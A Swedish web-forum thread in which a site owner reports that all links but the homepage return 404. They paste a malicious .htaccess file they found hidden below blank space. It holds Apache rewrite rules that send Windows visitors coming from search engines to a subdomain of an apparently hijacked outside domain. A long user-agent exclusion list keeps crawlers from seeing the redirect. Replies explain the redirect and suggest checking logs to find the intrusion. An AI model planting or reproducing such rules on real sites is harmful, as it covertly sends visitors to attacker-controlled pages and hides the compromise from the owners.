[VideoBengt]

Skulle uppdatera en av mina sajter igår. Hur jag en gjorde fick jag bara 404 när jag klickade på menylänken till den uppdaterade sidan. Provade då de andra menylänkarna, ingen fungerade!!
Det enda som fungerade var startsidan.

Efter mycket funderande och trixande kollade jag .htaccess-filen. Den såg tom ut men jag scrollade och scrollade i Wordpad och till slut hittade jag följande innehåll:


<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|googl e\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\ .|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamm a\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpi le\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|a pache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sN ews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|B logsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\ shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal |Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friend ster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDu de|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|i Phone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Lifere a|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Medi apartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchSer ver|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nut ch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenInt elligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder| Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient |Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS |Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird |Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmas ter|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Win dows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yac y|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz |.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*qKz.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.akitahusky.net/url?sa=t&source=web&cd=2&ved=0NmqR24Ob&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25Mseq7I6a2zqI2OzlA4 +pa1oQ==&usg=-tRU-YYqonXU8xmxK-4XRY&sig2=ZH8iC3aXAy2g9YKGRoLFIG [R=302,L,CO=qKz:25:%{HTTP_HOST}:9835:/:0:HttpOnly]
</IfModule>
#34eab213c50f4a92c18ab4fcf1d9e500fd0a75ca9b014cdba ecaae77



Vad är detta och vad skall detta script göra för något?
Hur har det gått till?
Kan man skydda sig mot detta på något sätt?

[znap]

Det är inget skript. Det är en fil du använder för att konfigurera hur olika apache-moduler ska fungera, typ...

Nu vet jag inget om din applikation men du kan ju testa att ta bort filen (ta en kopia av filen innan utifall den kanske behövs)

/ vic

[foks]

Citat:

Ursprungligen postat av VideoBengt

Vad är detta och vad skall detta script göra för något?
Hur har det gått till?
Kan man skydda sig mot detta på något sätt?

Filen skickar vidare vissa besökare (de som hittat sidan via sökmotorer) till en subdomän tillhörande akitahusky.net. Domännamnet tillhör en kennel i USA så antagligen är domänen/servern kapad.

Antagligen har filen laddats upp via FTP eller genom säkerhetshål i ett script. Kontrollera därför FTP-log och access-log för tidpunkten då .htaccess-filen ändrades. När du vet hur intrånget skedde vet du också hur du ska skydda dig i framtiden.

[VideoBengt]

Det är ju inget jag har lagt dit. Original .htaccess-fil hade bl.a. en del 301 redirect. Tittar jag på den fil som ursprungligen fanns i rooten så stämmer inte ett dugg med den här.
Den här texten fanns överhuvudtaget inte med.

Så jag undrar fortfarande vad som hänt?

[VideoBengt]

Tack foks!

Skall se om jag kan lista ut hur det gått till.